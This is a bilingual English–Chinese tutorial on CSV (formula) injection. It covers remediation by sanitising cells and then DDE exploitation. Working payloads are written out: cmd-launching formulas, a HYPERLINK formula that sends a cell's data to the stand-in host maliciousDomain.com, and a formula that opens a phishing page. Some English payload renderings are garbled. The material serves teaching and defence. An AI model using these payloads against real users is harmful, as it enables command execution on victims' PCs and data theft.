CSV Injection （CSV 注入攻击）_csv注入漏洞

CSV Injection

CSV Injection, also known as Formula Injection, occurs when websites embed untrusted input inside CSV files.
When a spreadsheet program such as Microsoft Excel or LibreOffice Calc is used to open a CSV, any cells starting with = will be interpreted by the software as a formula. Maliciously crafted formulas can be used for three key attacks:

CSV注入，也称为公式注入，发生在网站在CSV文件中嵌入不可信输入时。当使用电子表格程序(如Microsoft Excel或LibreOffice Calc)打开CSV时，所有以=开头的单元格都会被软件解释为一个公式。恶意构造的公式可以用于以下三种关键攻击。

• Hijacking the user’s computer by exploiting vulnerabilities in the spreadsheet software, such as CVE-2014-3524.
• 利用电子表格软件中的漏洞劫持用户的计算机，例如CVE-2014-3524。
• Hijacking the user’s computer by exploiting the user’s tendency to ignore security warnings in spreadsheets that they downloaded from their own website.
• 利用用户忽略从自己网站下载的电子表格中的安全警告的倾向，劫持用户的计算机。
• Exfiltrating contents from the spreadsheet, or other open spreadsheets.
• 从电子表格或其他打开的电子表格中提取内容。

This attack is difficult to mitigate, and explicitly disallowed from quite a few bug bounty programs. To remediate it, ensure that no cells begin with any of the following characters:
这种攻击很难减轻，而且很多bug赏金计划都明确禁止这种攻击。要解决这个问题，请确保单元格不以以下字符开头:

• Equals to (=)
• Plus (+)
• Minus (-)
• At (@)
• Tab (0x09)
• Carriage return (0x0D)

Keep in mind that it is not sufficient to make sure that the untrusted user input does not start with these characters. You also need to take care of the field separator (e.g., ‘,’, or ‘;’) and quotes (e.g., ', or "), as attackers could use this to start a new cell and then have the dangerous character in the middle of the user input, but at the beginning of a cell.

请记住，仅确保不受信任的用户输入不以这些字符开头是不够的。你还需要注意字段分隔符(例如，‘、‘或’;’)和引号(例如，‘或’ ')，因为攻击者可能会使用它来启动一个新单元格，然后将危险字符放在用户输入的中间，但在单元格的开头。

Alternatively, apply the following sanitization to each field of the CSV, so that their content will be read as text by the spreadsheet editor:

或者，对CSV的每个字段应用以下过滤，以便电子表格编辑器将它们的内容读取为文本:

• Wrap each cell field in double quotes
• 将每个单元格字段用双引号包裹起来
• Prepend each cell field with a single quote
• 在每个单元格字段前加上单引号
• Escape every double quote using an additional double quote
• 使用额外的双引号转义每个双引号

Principle of vulnerability

Create an xls file and enter =1+1 in a cell, and you should see that the value changes to 2, indicating that the plus sign was performed as an operation.

创建一个xls文件，在单元格中输入=1+1，回车后可以看到值变成了2，说明加号被当做运算执行了。

Of course, it’s not just the + sign that performs arithmetic; symbols like =, -, and @ are also interpreted as formulas in excel.

当然，不止是+号能执行运算，=、-、@ 这样的符号也会被excel解析为公式。

DDE（Dynamic Data Exchange）
DDE is an inter-process communication protocol under Windows, which is a dynamic data exchange mechanism. Using DDE communication requires two Windows applications, one of which processes information as a server, and the other gets information from the server as a client. DDE supports Microsoft Excel, LibreOffice, and Apache OpenOffice. Excel, Word, Rtf, Outlook can all use this mechanism to update content based on the results of external applications. So if we make a CSV file containing the DDE formula, Excel tries to execute an external application when opening that file.

DDE是Windows下进程间通信协议，是一种动态数据交换机制，使用DDE通讯需要两个Windows应用程序，其中一个作为服务器处理信息，另外一个作为客户机从服务器获得信息。DDE支持Microsoft Excel，LibreOffice和Apache OpenOffice。 Excel、Word、Rtf、Outlook都 可以使用这种机制，根据外部应用的处理结果来更新内容。因此，如果我们制作包含DDE公式的CSV文件，那么在打开该文件时，Excel就会尝试执行外部应用。

For example, if we construct a csv or xls file containing the following string:

比如我们构造包含如下字符串的csv或xls文件：

=cmd | ‘/ C calc’ ！A0
Excel will try to invoke the native CMD command with a friendly prompt if the user unconsciously clicks yes:

Excel会尝试调用本机CMD命令，给出友好提示，若用户在无意识状态下点击“是”：

It then tries to accept the typo correction; if it does not accept the correction, it will execute cmd

而后尝试接受更正拼写错误，不接受更正则会执行cmd命令

The business system accepts user input and exports it as csv=> The malicious user enters the payload through the interface. The victim downloads the file and runs it on the PC. The victim’s PC is attacked. Therefore, DDE injection attack is an attack where the source of attack comes from a website, but the final target is a normal user’s PC.

业务系统接受用户输入并导出为csv=>恶意用户通过界面输入payload=>受害者下载文件并在PC运行=>受害者PC被攻击。因此DDE注入攻击是一种攻击源来自网站，但最终目标是普通用户PC的一种攻击。

Vulnerability hazard

OS command execution

OS命令执行

OS arbitrary command execution is one of the main hazards, as mentioned above, you can use the CMD = | 'calc/C! A0 play calculator or using CMD = | 'ipconfig/k! A0 pops the ipconfig command to detect whether the vulnerability exists. Analogically to XSS, if the system can implement alert (1), it means that we can execute arbitrary js code, depending on how we use it. For example:

OS任意命令执行是最主要的危害，像上面讲过的，可以使用= cmd | ‘/ C calc’ ！A0弹计算器或者使用=cmd|‘/k ipconfig’!A0弹出ipconfig命令的方式探测漏洞是否存在。类比XSS的利用思路，如果系统可以实现alert（1）弹框效果，说明我们可以执行任意的js代码，这取决于我们的利用思路。比如：

• Adding users
• 添加用户；
• Open any application: Internet Explorer;
• 开启任意应用程序：IE；
• Operating the registry
• 操作注册表；
• Rebound shell;
• 反弹shell；

Information leakage

信息泄露

The Hyperlink function creates a shortcut and makes a jump. When a cell containing the HYPERLINK function is clicked, Microsoft Excel opens a file stored in link_location, such as:

超链接功能 Hyperlink创建快捷方式并进行跳转，单击包含HYPERLINK函数的单元格时，Microsoft Excel将打开存储在link_location的文件，如：

You can set one of the table cells to the following:

可将表格其中一个单元格设置为以下形式：

=HYPERLINK(“https://maliciousDomain.com/evil.html?data=”&A1,“Click to view additional information”)”
A cell is created that displays the text “Click to see additional information,” and when the user clicks, the data in A1 is sent to maliciousDomain.com, causing the information to be leaked. Of course, this attack can also be achieved using the first attack method, as follows:

将创建一个单元格，显示文本“单击以查看其他信息”，当用户单击，将发送A1中的数据到maliciousDomain.com，从而导致信息泄露。当然使用第一种攻击方式也可以实现这种攻击效果，如：

=6-5 cmd|’ /C “C:\Program Files\InternetExplorer\iexplore.exe” http:///asd.html’!A0

It directs the user to a phishing website to steal hashes and passwords.

它将用户定向到恶意钓鱼网站，实现窃取哈希值和口令等操作。